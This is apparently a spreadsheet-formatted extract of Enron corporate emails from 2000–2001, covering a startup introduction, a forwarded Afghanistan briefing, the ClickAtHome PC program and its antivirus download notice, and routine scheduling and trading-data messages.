President and C.O.O.,_x000D_
Enron Corp._x000D_
_x000D_
Dear Jeff,_x000D_
_x000D_
This email is from Robert Jarrow (Cornell) and myself (Joe Cherian). I hope_x000D_
you recall meeting/lunching with Bob Jarrow &amp; me when you keynoted at my_x000D_
1999 Math Finance Day conference here at Boston University. I wanted to_x000D_
introduce you to SKG Inc., a startup that is focused on providing an_x000D_
innovative service to the electronic trading community. Messers Kuppuswamy_x000D_
Seshadhri, Sriketan Mahanti, and Gaurav Mallik are the principal founders_x000D_
of SKG, Inc. Bob Jarrow and I represent the company's Scientific Advisory_x000D_
Board. Nobel laureate Robert Merton, who also sat on our table during your_x000D_
keynote address, very kindly serves as an ad hoc Senior Advisor to SKG and_x000D_
has been an invaluable resource to SKG, including putting us in touch with_x000D_
JP Morgan. Coincidentally, the C.O.O. of JP Morgan Capital Corp. Ed_x000D_
Colloton, in an April 7 meeting told us he would introduce us to the C.F.O._x000D_
of Enron Online, whom he knows and at which he felt SKG would have huge_x000D_
value-adding opportunities. However, given Ed's busy travel schedule, I_x000D_
don't believe he has been able to do that yet. Hence this joint decision by_x000D_
Bob Jarrow and myself to send you this email._x000D_
_x000D_
SKG's solution is to provide dynamic pricing and value maximization in_x000D_
electronic trading of securities/commodities on ECNs and ATSs (Alternative_x000D_
Trading Systems). It achieves this through a process of "strategic_x000D_
negotiation" using automated agents (intelligent software manifestations)._x000D_
Our system should not be viewed as an ECN, but rather as an enhancement to_x000D_
any extant trading system, be it an ECN, ATS, CLOB, NASDAQ, etc. Our_x000D_
initial system design has been conducted for financial instruments trading,_x000D_
e.g. bonds/equities, but our strategy is as much applicable to energy/power_x000D_
instruments trading, high speed communications bandwidth trading, and other_x000D_
web-based commodities trading, which we believe is of interest to Enron_x000D_
Online._x000D_
_x000D_
SKG is superior to existing solutions in the following way:_x000D_
1)  It considers multiple attributes, e.g., price, time, volatility,_x000D_
bandwidth. (In high speed communication bandwidth scenarios, for example,_x000D_
the dimensions could be price, bandwidth size, time for which bandwidth_x000D_
available, continguity of the allocation, and such.)_x000D_
2) It involves dynamic matching as opposed to "static" matching._x000D_
3) It is multi-lateral._x000D_
4)  It adapts itself dynamically to changing market conditions._x000D_
5) It allows traders to make important trade-offs, as they do in_x000D_
traditional markets._x000D_
_x000D_
Currently, SKG is involved in discussions with the Heads of Trading at_x000D_
Fidelity, Putnam Investments, Lehman Bros., KPMG, Meridien Research,_x000D_
Salomon Smith Barney, JP Morgan, State Street, Banc of America, McKinsey,_x000D_
Citizens Power, and a host of other folks._x000D_
_x000D_
We think we have a value-adding service to provide to Enron Online or any_x000D_
other Enron subsidiary that the SKG offering matches and that you deem fit._x000D_
SKG's founders and I will be very happy to provide you or your_x000D_
representative(s) with more details, including a demo of the prototype, in_x000D_
a meeting. We are therefore hopeful that you will be able to arrange_x000D_
something appropriate._x000D_
_x000D_
Thanks very much, Jeff! We look forward to hearing from you._x000D_
_x000D_
With warm regards,_x000D_
Joseph Cherian and Robert Jarrow_x000D_
_x000D_
Cc: Professor Robert C. Merton_x000D_
_x000D_
Joseph A. Cherian_x000D_
Associate Professor of Finance_x000D_
Boston University School of Management_x000D_
595 Commonwealth Avenue, Room 522H_x000D_
Boston, MA 02215_x000D_
TEL: 617-353-2679 (O)_x000D_
  617-353-6667 (Fax)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 07:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.pacewic@phs.com'})</t>
  </si>
  <si>
    <t>game</t>
  </si>
  <si>
    <t xml:space="preserve">Guz,_x000D_
_x000D_
I just got some tickets to the game tonight from work.  If you are going_x000D_
somewhere before I'd love to hook up._x000D_
_x000D_
I don't have your phone at your desk, maybe I'll try your cell if you don't_x000D_
get this message._x000D_
_x000D_
B_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 09:21:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Competitive Analysis Update- US Attacks Afghanistan #2</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Johnston, Robert  _x000D_
Sent:	Friday, October 12, 2001 11:04 AM_x000D_
To:	Whalley, Greg; Mcconnell, Mike; Shankman, Jeffrey A.; Reed, Andrea V.; Lavorato, John; Kitchen, Louise; Hickerson, Gary; Nowlan Jr., John L.; Fiala, Markus; Presto, Kevin M.; Grigsby, Mike; Belden, Tim; Shahi, Pushkar; Tholan, Scott; Woody, Rus; Seigle, Clayton; Fitzsimmons, Brendan; Roth, Jim; Robertson, Linda; Kean, Steven J._x000D_
Subject:	Competitive Analysis Update- US Attacks Afghanistan #2_x000D_
Importance:	High_x000D_
_x000D_
Update below on ground campaign strategy &amp; timing, as well as mounting pressures on Saudi and Pakistani governments. Two reports suggest the ground campaign is underway.   There are also press reports about an anthrax case in NYC--we are investigating and will update as soon as possible._x000D_
_x000D_
Call with questions._x000D_
_x000D_
RJ_x000D_
x39934_x000D_
_x000D_
_x000D_
1.	Afghanistan Ground War Set to Escalate_x000D_
_x000D_
With a target list thinner than for Kosovo, results from the Afghanistan air campaign five days on have been limited.   But with Taleban fixed defences now softened up, the next phase of search and destroy ground raids, carried out by US and UK special forces and light assault forces, could be imminent.   Insertion will be difficult but various sightings made in recent days suggest to us that the process may have begun.   All our indications are that the US will commit a light division (up to 10,000 troops) and the UK a brigade (about 3,500).   This is a bigger commitment than previously advertised.  More stories along this line may become public over the weekend, even if the Pentagon does not explicitly confirm the action._x000D_
_x000D_
Word from Kabul is that Taleban morale is still high and that nightly bombings have prompted some commanders in the Northern Alliance to switch sides, joining the Taleban against the foreign invader.   But outlying Taleban commanders have defected the other way.   There is no clear pattern yet to these changes of allegiance and they may cancel each other out.  And as long as the air strikes remain accurate and clearly targeted against Taleban and bin Laden objectives - which they have been so far - the potential for the Taleban to rally more popular support in Afghanistan seems limited._x000D_
_x000D_
When the ground assault starts, from three or four strong points inside Afghanistan, the immediate aim will be to flush out Taleban forces and get them moving so they can be struck from the air.   Such action will be fast and high risk, without much media coverage (with the attendant risk that public support in the US diminishes if the real action is unseen).   If the Taleban can be thus loosened, special forces will then look for Afghans who can take them to the inner core of the Al Qaeda, led by bin Laden and Aymar al Zarawahi.  Depending on how long this takes, there is hope among allied planners that "reasonable elements" in the Taleban regime can be detached to form part of a broad-based coalition to run Afghanistan under supervision.   The Northern Alliance on its own is definitely not the answer._x000D_
_x000D_
2.	Saudis Feeling Increased Pressure_x000D_
_x000D_
Refusal by Crown Prince Abdullah to allow Tony Blair to visit Saudi was only one manifestation of current nervousness in the Kingdom.   The tally of small, isolated violent incidents and attacks on Westerners in the interior is beginning to mount.   We have specific information moreover that leading Saudis who have not in the past paid money into Al Qaeda's coffers are now being 'advised' to do so, on grounds that they will not wish to incur Osama bin Laden's future displeasure._x000D_
_x000D_
Washington and London say the motivation for Abdullah's decision was well understood but both believe it was a mistake.  The points which Blair would have raised in public have been made by the British Ambassador in Riyadh to his Saudi hosts privately but it was the symbolism of the Prime Minister meeting with the King and the Crown Prince which London and Washington wanted to see.   Blair was particularly galled by Abdullah's blunt refusal to accept the visit when the two men spoke on the phone, particularly as it was the one blot on his most recent schedule of achievement._x000D_
_x000D_
3.	Pakistan Holding Steady- For Now_x000D_
_x000D_
Popular unrest in Pakistan is real but amplified by media coverage.   Even in Peshawar we are told that 'playing to the cameras' has become a distinct element of the protest.   Musharraf meanwhile, having reshuffled top military and intelligence appointees, maintains both his grip and a wary eye on any signs of a split within his own ranks.  Our assessment is that he is controlling the situation - just._x000D_
_x000D_
4.	Key Issue for U.S. and Arab allies- Wider War?_x000D_
_x000D_
There is also a distinct sense in Washington that major decisions are approaching.   This is not just the imminence of ground troops being deployed in Afghanistan, but the much wider question of the stability of Pakistan, the Gulf including Saudi Arabia, Egypt and Turkey being put in some jeopardy.   Those who have thought through these issues say they are prepared to risk it.   As long as action against terrorism concentrates on Afghanistan, the leaderships of most of these countries believe the situation will remain manageable.   But if it were to spill over, there could be difficulties for these regimes._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 08:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Acceptance</t>
  </si>
  <si>
    <t xml:space="preserve">I accept the terms and conditions of this Pilot Participant Agreement_x000D_
_x000D_
_x000D_
_x000D_
	ClickAtHomePilot2_x000D_
	Sent by: Suzanne Brown_x000D_
	11/03/2000 11:30 AM_x000D_
		 _x000D_
		 To: Stephanie Olszewski/HR/Corp/Enron@ENRON, Aida S O'Neal/SFO/EES@EES, _x000D_
Bobby Oubre/GPGFIN/Enron@ENRON, Wade Owen/Enron Communications@Enron _x000D_
Communications, Cliff Owens/GCO/Enron@Enron, David Oxley/HOU/ECT@ECT, Juan _x000D_
Padron/NA/Enron@Enron, Venkatesh Palanisamy/OTS/Enron@Enron, Mark _x000D_
Palmer/Corp/Enron@ENRON, Michelle Parks/Corp/Enron@Enron, Joe _x000D_
Parks/Corp/Enron@ENRON, Andrew Parsons/Corp/Enron@Enron, Jay _x000D_
Patel/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Sanjay Patel/NA/Enron@Enron, _x000D_
Christie Patrick/HOU/ECT@ECT, Shelly Payne/HR/Corp/Enron@ENRON, Barry _x000D_
Pearce/Enron Communications@Enron Communications, Renee _x000D_
Pena/HR/Corp/Enron@ENRON, Maria Perales/ET&amp;S/Enron@ENRON, Kim _x000D_
Perez/ET&amp;S/Enron@ENRON, Beth Perlman/HOU/ECT@ECT, Mona L _x000D_
Petrochko/NA/Enron@Enron, Meredith Philipp/Corp/Enron@ENRON, Ron _x000D_
Pieronek/Corp/Enron@ENRON, Stephen Plauche/Corp/Enron@Enron, LaShanda _x000D_
Poledore/Corp/Enron@ENRON, Deelyn Pool/ET&amp;S/Enron@ENRON, Kenneth _x000D_
Poole/OTS/Enron@ENRON, Michael J Popkin/NA/Enron@Enron, David V. _x000D_
Porter/HOU/EES@EES, Patricia Post/GCO/Enron@ENRON, bobp@nepco.com, Geoff _x000D_
Prosch/HOU/EES@EES, Ben Pruitt/Corp/Enron@Enron, Fred Puetz/NPNG/Enron@ENRON, _x000D_
Catherine Queiroga/HR/Corp/Enron@ENRON, George Quittner/ET&amp;S/Enron@ENRON, _x000D_
Donna Rabalais/Enron Communications@Enron Communications, Pilar _x000D_
Ramirez/ET&amp;S/Enron@ENRON, Marie Rankin/Enron Communications@Enron _x000D_
Communications, Ramesh Rao/NA/Enron@Enron, Dale Rasmussen/HOU/ECT@ECT, _x000D_
Michael Rasmussen/NPNG/Enron@Enron, John D Reese/NA/Enron@Enron, James _x000D_
Regan/OTS/Enron@ENRON, Richard Reichardt/Enron Communications@Enron _x000D_
Communications, Faith Reid/OTS/Enron@Enron, Kenneth _x000D_
Reinheimer/ECF/Enron@ENRON, Selma Reyna/Corp/Enron@ENRON, Pam _x000D_
Rhea/Corp/Enron@Enron, Joonhee Rhee/Corp/Enron@ENRON, Greek _x000D_
Rice/Corp/Enron@ENRON, Amy Rios/HOU/ECT@ECT, Jonathan Risch/HOU/EES@EES, _x000D_
raulr@nepco.com, Kimberly Rizzi/HOU/ECT@ECT, Bobby Robertson/Enron _x000D_
Communications@Enron Communications, Richard T Robinson/HOU/ECT@ECT, Kyle _x000D_
Roblee/HOU/EES@EES, Elaine Rodriguez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Erica Rodriguez/Corp/Enron@Enron, Joe Rodriguez/OTS/Enron@ENRON, Ruben _x000D_
Rodriguez/OTS/Enron@Enron, Rex Rogers/Corp/Enron@Enron, Larry _x000D_
Romero/HOU/EES@EES, Tobey Roquemore/HOU/EES@EES, John M _x000D_
Rose/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kayla Ruiz/Corp/Enron@ENRON, Norm _x000D_
Ruiz/ET&amp;S/Enron@ENRON, Kevin Ruscitti/HOU/ECT@ECT, Stan _x000D_
Ryzinski/OTS/Enron@ENRON, Neil Sainsbury-Carter/NA/Enron@Enron, Delma _x000D_
Salazar/NA/Enron@Enron, Jose Salinas/ECF/Enron@ENRON, Marian _x000D_
Salinas/FGT/Enron@ENRON, Tom B Sampson/OTS/Enron@ENRON, Helen _x000D_
Sandefer/Midland/Eott@Eott, Becki Sans Souci/ET&amp;S/Enron@ENRON, Katherine _x000D_
Saunders/HOU/EES@EES, Angela Sayegh/OTS/Enron@ENRON, Gaye Lynn _x000D_
Schaffart/NPNG/Enron@Enron, Marsha Schiller/HOU/ECT@ECT, theodores@nepco.com, _x000D_
Michael Schneider/ET&amp;S/Enron@ENRON, Tammie Schoppe/HOU/ECT@ECT, Bob _x000D_
Schorr/HOU/ECT@ECT, Lance Schuler-Legal/HOU/ECT@ECT, Laura _x000D_
Schwartz/Corp/Enron@Enron, Tami Scrudder/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
koreys@nepco.com, Ted Seitz/Enron Communications@Enron Communications, Jill _x000D_
Setera/ET&amp;S/Enron@Enron, Robert Sevitz/NA/Enron@Enron, Kal Shah/HOU/ECT@ECT, _x000D_
Rehman Sharif/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michael _x000D_
Shaw/ET&amp;S/Enron@ENRON, George Sheafer/GCO/Enron@Enron, Sandy _x000D_
Sheffield/GPGFIN/Enron@ENRON, Richard Shepherd/NPNG/Enron@ENRON, Linda _x000D_
Shoup/HOU/EES@EES, Bonnie Shumaker/HOU/EES@EES, Ray S Siada/DUB/EES@EES, _x000D_
Misha Siegel/Corp/Enron@ENRON, Mary H Silva/HOU/EES@EES, Cindy _x000D_
Simon/SFO/EES@EES, George Simpson/Corp/Enron@Enron, Cheryl _x000D_
Slone/EPSC/HOU/ECT@ECT, Michael J Smalling/HOU/ECT@ECT, Chris A _x000D_
Smith/OTS/Enron@Enron, Gary P Smith/EWC/Enron@ENRON, Jimmie _x000D_
Smith/ET&amp;S/Enron@ENRON, Tommy Smith/ECF/Enron@ENRON, Brad J _x000D_
Snyder/HOU/EES@EES, Mary Sontag/Corp/Enron@ENRON, Gary Sova/ET&amp;S/Enron@ENRON, _x000D_
Bob Sparger/Corp/Enron@Enron, Keith _x000D_
Sparks/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Angela Sprock/HOU/ECT@ECT, Thomas _x000D_
Sroka/ET&amp;S/Enron@ENRON, Don Stacy/ET&amp;S/Enron@ENRON, Robert _x000D_
Stalford/NA/Enron@Enron, Peter R Stark/OTS/Enron@ENRON, John _x000D_
Steenberg/OTS/Enron@ENRON, Ray Stelly/Enron Communications@Enron _x000D_
Communications, Luly Stephens/NA/Enron@Enron, Jason Stephens/HOU/ECT@ECT, _x000D_
Kelli Stevens/HOU/ECT@ECT, Bradley Stewart/HOU/ECT@ECT, Jennifer _x000D_
Stewart/NA/Enron@Enron, Sandy Stone/Enron Communications@Enron _x000D_
Communications, Cynthia Story/Corp/Enron@ENRON, Scott Stout/Enron _x000D_
Communications@Enron Communications, Ava Stovall/NPNG/Enron@Enron, Christine _x000D_
Straatmann/HOU/EES@EES, Kelly Strader/ET&amp;S/Enron@Enron, Wade _x000D_
Stubblefield/HOU/EES@EES, Kathy Sturr/ET&amp;S/Enron@ENRON, Kriste _x000D_
Sullivan/Corp/Enron@ENRON, Dinah Sultanik/HR/Corp/Enron@ENRON, Alper _x000D_
Sunar/OTS/Enron@Enron, Tim Sundel/HOU/EES@EES, Jim _x000D_
Sutherland/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Suttle/HOU/ECT@ECT, _x000D_
Scott Swanson/NPNG/Enron@ENRON, Twanda Sweet/HOU/ECT@ECT, John _x000D_
Swinney/HOU/ECT@ECT, Omar Taha/Corp/Enron@Enron, Mable Tang/HOU/ECT@ECT, _x000D_
Claudia Tauzel/DUB/EES@EES, Liz M Taylor/HOU/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT, LuAnn Teigen/NPNG/Enron@ENRON, Dzung _x000D_
Thai/GCO/Enron@ENRON, Hardy Thomas/FGT/Enron@ENRON, Charlie _x000D_
Thompson/GCO/Enron@ENRON, suet@nepco.com, Terence H _x000D_
Thorn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Susan Tosoni/HR/Corp/Enron@ENRON, _x000D_
John Towles/NA/Enron@ENRON, David Tran/ET&amp;S/Enron@ENRON, Richard _x000D_
Troyer/ET&amp;S/Enron@ENRON, James Trudeau/SFO/EES@EES, Bruce _x000D_
Tuttle/NPNG/Enron@Enron, Dick Uran/NPNG/Enron@Enron, Larry _x000D_
Urban/ET&amp;S/Enron@ENRON, Carlos Uribe/Corp/Enron@ENRON, Kramer _x000D_
Vakil/ET&amp;S/Enron@ENRON, Sue Vanavech/OTS/Enron@ENRON, Josue _x000D_
Vasquez/ET&amp;S/Enron@Enron, Robin Veariel/HOU/ECT@ECT, Lillian _x000D_
Villarreal/Corp/Enron@ENRON, Jeffrey Vincent/NA/Enron@Enron, Peter _x000D_
Vint/HOU/EES@EES, John Viverito/Corp/Enron@Enron, Scott _x000D_
Vonderheide/Corp/Enron@ENRON, Clarian Vondrak/Corp/Enron@ENRON, Susan _x000D_
Wadle/Enron Communications@Enron Communications, Sheila Walton/HOU/ECT@ECT, _x000D_
Julie Wang/Enron Communications@Enron Communications, Leslie A _x000D_
Ward/HOU/EES@EES, Demetrion Ware/Corp/Enron@Enron, George _x000D_
Wasaff/NA/Enron@Enron, Margaret Waters/ET&amp;S/Enron@ENRON, Richard Weeks/Enron _x000D_
Communications@Enron Communications, Debra Weir/HR/Corp/Enron@ENRON, Steve _x000D_
Weller/ET&amp;S/Enron@ENRON, Emma Kam Welsch/HOU/ECT@ECT, Jon _x000D_
Werner/Corp/Enron@ENRON, Cherylene R Westbrook/HOU/ECT@ECT, Roger _x000D_
Westbrook/OTS/Enron@ENRON, Jubran Whalan/HOU/EES@EES, Dianne White/Enron _x000D_
Communications@Enron Communications, Leesa White/HOU/ECT@ECT, Britt _x000D_
Whitman/NA/Enron@ENRON, Tim Whorton/ET&amp;S/Enron@ENRON, Patricia _x000D_
Wiederholt/NPNG/Enron@ENRON, Gloria Wier/ET&amp;S/Enron@ENRON, John _x000D_
Will/NA/Enron@ENRON, Tammie Williams/OTS/Enron@ENRON, Walt _x000D_
Williams/ET&amp;S/Enron@ENRON, Willie _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Scott Williamson/HOU/ECT@ECT, _x000D_
Susan Wimberley/HOU/ECT@ECT, Nancy Wood/ET&amp;S/Enron@ENRON, Russell Woody/Enron _x000D_
Communications@Enron Communications, Lewis Worthy/HOU/ECT@ECT, Erica _x000D_
Wright/NA/Enron@Enron, CJ Xu/Corp/Enron@Enron, Jackie Young/HOU/ECT@ECT, Jeff _x000D_
Youngflesh/NA/Enron@ENRON, Jin Yu/HOU/ECT@ECT, Benton _x000D_
Yue/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kim Zachary/HOU/EES@EES, Cristina _x000D_
Zavala/SF/ECT@ECT, Debbie Zdunkawicz/HOU/EES@EES, Anchi Zhang/HOU/ECT@ECT, _x000D_
Xiaoge Zhou/Enron Communications@Enron Communications, Joe _x000D_
Zhou/FGT/Enron@Enron, Sean Zurbrick/DUB/EES@EES_x000D_
		 cc: David Oxley/HOU/ECT@ECT, Cindy Skinner/HOU/ECT@ECT, Dave _x000D_
Schafer/NA/Enron@ENRON, Kimberly Rizzi/HOU/ECT@ECT, Sheila _x000D_
Walton/HOU/ECT@ECT, Marla Barnard/Enron Communications@Enron Communications, _x000D_
Gary P Smith/EWC/Enron@ENRON, Robert Jones/Corp/Enron@ENRON, Janie _x000D_
Bonnard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Willie _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Brad Coleman/HOU/ECT@ECT, Ray _x000D_
Bennett/HOU/EES@EES, Allen Hill/Enron Communications@Enron Communications, _x000D_
Marie Newhouse/Corp/Enron@Enron, Suzanne Brown/HOU/ECT@ECT, Tony _x000D_
Jarrett/Corp/Enron@ENRON, Sharon Butcher/Corp/Enron@ENRON, Susan _x000D_
Lopez/HOU/ECT@ECT, LaMetrice Dopson/NA/Enron@Enron, Darin _x000D_
Carlisle/NA/Enron@Enron, Randy Rice/OTS/Enron@ENRON, Peter _x000D_
Goebel/NA/Enron@Enron, Mark Thibodeaux/HOU/ECT@ECT, Keith _x000D_
Dziadek/NA/Enron@Enron, Todd Neugebauer/Enron Communications@Enron _x000D_
Communications, Yevgeny Frolov/Enron Communications@Enron Communications, _x000D_
Kevin Whitehurst/NA/Enron@ENRON, David Wise/NA/Enron@Enron_x000D_
		 Subject: ClickAtHome Pilot 2 Information_x000D_
_x000D_
Thank you for an overwhelming response to participate in ClickAtHome's Second _x000D_
Pilot.    For those of you who have signed up, we are excited to have you in _x000D_
this pilot.  We look forward to you testing our process and services and _x000D_
giving us feedback!_x000D_
_x000D_
In order to be eligible for Pilot 2, please read and agree to the Pilot _x000D_
Participant Agreement and then respond to the ClickAtHomePilot2@enron.com _x000D_
email box with the following statement:    "I accept the terms and conditions _x000D_
of this Pilot Participant Agreement." with the Pilot agreement attached._x000D_
_x000D_
Once we have received your acceptance,  you will be eligible and confirmed _x000D_
for Pilot 2._x000D_
_x000D_
Those who are confirmed for Pilot 2 will receive an email the week of _x000D_
November 13th on how and when they can access the ordering website.  Until _x000D_
that point,  the website will not be accessible._x000D_
_x000D_
Employees will have great options under this program for computers, _x000D_
peripherals, and Internet connectivity.   Your personal selections will _x000D_
determine your out-of-pocket expense, if any.  _x000D_
_x000D_
We know you are interested in more details.  However, one of our primary _x000D_
Pilot objectives is to test the communication on the website.  We would like _x000D_
you to review more details about program offerings and related out-of-pocket _x000D_
costs, if any, once the pilot website is available.  After agreeing to the _x000D_
Pilot Participants Agreement and reviewing these materials on the website, _x000D_
you may choose to defer ordering until the All Employee roll-out in early _x000D_
2001 if you wish._x000D_
_x000D_
Please send any questions to the clickathomepilot2@enron.com mailbox._x000D_
_x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 08:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'corina.taylor@enron.com'})</t>
  </si>
  <si>
    <t>UofH Central Resume Review Selection 11C2</t>
  </si>
  <si>
    <t>Please come join for a resume review meeting.  We will select candidates to _x000D_
interview for the Enron Analyst Program.  The meeting will take place in EB _x000D_
11C2.  I look forward to seeing you_x000D_
_x000D_
*** Please note, today were in our second round interviews with the _x000D_
University of Houston Clear Lake.  I will let you know tomorrow, which _x000D_
candidates have been selected to return for a Super Saturday.***</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 09:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: March Data</t>
  </si>
  <si>
    <t xml:space="preserve">I don't have good numbers for the 30 or 31st yet but you I think everythink _x000D_
else is good._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffrey Porter@NEWPOWER_x000D_
04/04/2001 03:14 PM_x000D_
To: joann.collins@enron.com, Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: March Data_x000D_
_x000D_
Joanne-could I please get a final storage report for Mar'01?_x000D_
_x000D_
Chris-can you please send me your spreadsheet for Mar'01?_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laine.powell@enron.com', 'richard.lammers@enron.com', 'john.novak@enron.com'})</t>
  </si>
  <si>
    <t>OPIC/KFW Next Steps</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with Mary Mervene this morning and the llenders declined to convene _x000D_
this week although we will arrange an ECA call for Thursday or Friday.  Mary _x000D_
has requested that we do the following:_x000D_
_x000D_
1) Send the Lenders and S&amp;W the new budget info and the revised change order _x000D_
summary._x000D_
_x000D_
2) Revise the model to reflect the new costs and the new timeline._x000D_
_x000D_
3) S&amp;W will review the model and then we will repeat the exercise of _x000D_
calculating fuel oil and Furnas penalty exposures._x000D_
_x000D_
4) Finalize sponsor support elements._x000D_
_x000D_
This can all occur fairly quickly except I am concerned because we have not _x000D_
resolved the budget with Shell,  and theoretically the lenders can take 30 _x000D_
days to review the model and budget when submitted._x000D_
_x000D_
We also need to discuss strategy because we may want to delete the _x000D_
contingency from the budget since the lenders are going to want the sponsors _x000D_
to commit to some general contingency supporty anyway.  </t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 08:14:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.coffing@enron.com', 'tom.alonso@enron.com', 'sean.crandall@enron.com', 'serena.bishop@enron.com', 'holden.salisbury@enron.com', 'mark.fischer@enron.com', 'kysa.alport@enron.com', 'chris.mallory@enron.com', 'prescheduling.dl-portland@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>Here is the schedule for the Thanksgiving Holiday</t>
  </si>
  <si>
    <t>Thanksgiving - Thursday, November 22, 2001 _x000D_
Monday, November 19 - Preschedule for Tuesday-Wednesday, November 20-21 (2) _x000D_
Tuesday, November 20 - Preschedule for Thursday-Saturday, November 22-24(3) _x000D_
Wednesday, November 21 - Preschedule for Sunday-Monday, November 25-26(2) _x000D_
_x000D_
Thanks,_x000D_
Stacy</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 00:17:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Important Information About Security &amp; ClickAtHome</t>
  </si>
  <si>
    <t>_x000D_
Dear ClickAtHome Participant,_x000D_
_x000D_
ClickAtHome is interested in making sure you have the latest security tools available to you.  As part of the ClickAtHome program, you may download and update Norton Anti-Virus and BlackICE Defender software from the ClickAtHome Portal.  _x000D_
_x000D_
Norton AntiVirus software repairs computer virus infections automatically.  It scans and cleans your hard drive, diskettes and both incoming and outgoing email.  _x000D_
BlackICE Defender is an industrial-strength anti-hacker system that protects your PC by scanning your DSL, cable modem, or dial-up Internet connection looking for hacker activity. When it detects an attempted intrusion, it automatically blocks traffic from that source, keeping intruders from accessing your system. _x000D_
By installing and updating both Norton AntiVirus and BlackICE Defender, your ClickAtHome PC will have the latest security offered by these two products.  _x000D_
Instructions for accessing the Portal and downloading the software are provided below._x000D_
If you have any questions or wish to provide feedback, please email clickathome@enron.com.  Thank you for your participation in ClickAtHome._x000D_
The ClickAtHome Team!_x000D_
___________________________________x000D_
To download the software:_x000D_
1)  Visit the ClickAtHome Portal at www.clickathome.net from your ClickAtHome PC._x000D_
2)  Logon to the Portal with your personally created Portal User ID and Password, or create a new account if you have not created a user ID and password by selecting "Create a NEW Account" at the top left corner.  The Portal User IDs and Passwords are created by you.  The Enron Help Desk is not able to assist with Portal support, but if you need any assistance, please send an email to "clickathome@enron.com"._x000D_
3) Once you have logged on, select "Tools" from the top menu bar._x000D_
4) Under the "Secure Download" heading, click on "BlackICE" or "Norton" and log on to the download page using your SAP ID and Date of Birth._x000D_
5) Follow the directions provided on screen.</t>
  </si>
  <si>
    <t>Sat, 21 Apr 2001 17:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/22/01; HourAhead hour: 1;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/22/01; HourAhead hour: 1;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042201.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 1 / Preferred:   5.33 / Final:   5.30)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SCE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 02:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.johnson@enron.com'})</t>
  </si>
  <si>
    <t>EnronOnline, Online Help Guide</t>
  </si>
  <si>
    <t>Mark:_x000D_
_x000D_
I am the writer that is developing the online help guide for the EnronOnIine _x000D_
system.  I work for Dave Forster.  Dave wanted to make sure that you have an _x000D_
opportunity to review the online help guide before we go live.  My _x000D_
understanding is that you have access to the test web.  The work in progress _x000D_
help guide is on the website but is by no means a finished product; it _x000D_
changes as screens and labels change.  Are you currently reviewing the online _x000D_
help or do I need to advise you when it is considered final?  Please let me _x000D_
know if you have a preferred way of reviewing this sort of thing. Thanks,_x000D_
_x000D_
Laura J</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 07:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New EOL Product - Crude Oil Financial</t>
  </si>
  <si>
    <t xml:space="preserve">Tana/Karen:_x000D_
_x000D_
The product long description below will fall under the new product type US=_x000D_
=20_x000D_
Crude Basis Swap.  Credit (Tom Moran) has approved copying the profiles for=_x000D_
=20_x000D_
the new product type from the following:_x000D_
_x000D_
US WTI Fin Swap_x000D_
_x000D_
Please respond by 10 a.m. on Wednesday, November 8._x000D_
_x000D_
Thank you._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 11/07/2000 02:04 P=_x000D_
M=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Robert B Cass_x000D_
10/31/2000 05:13 PM_x000D_
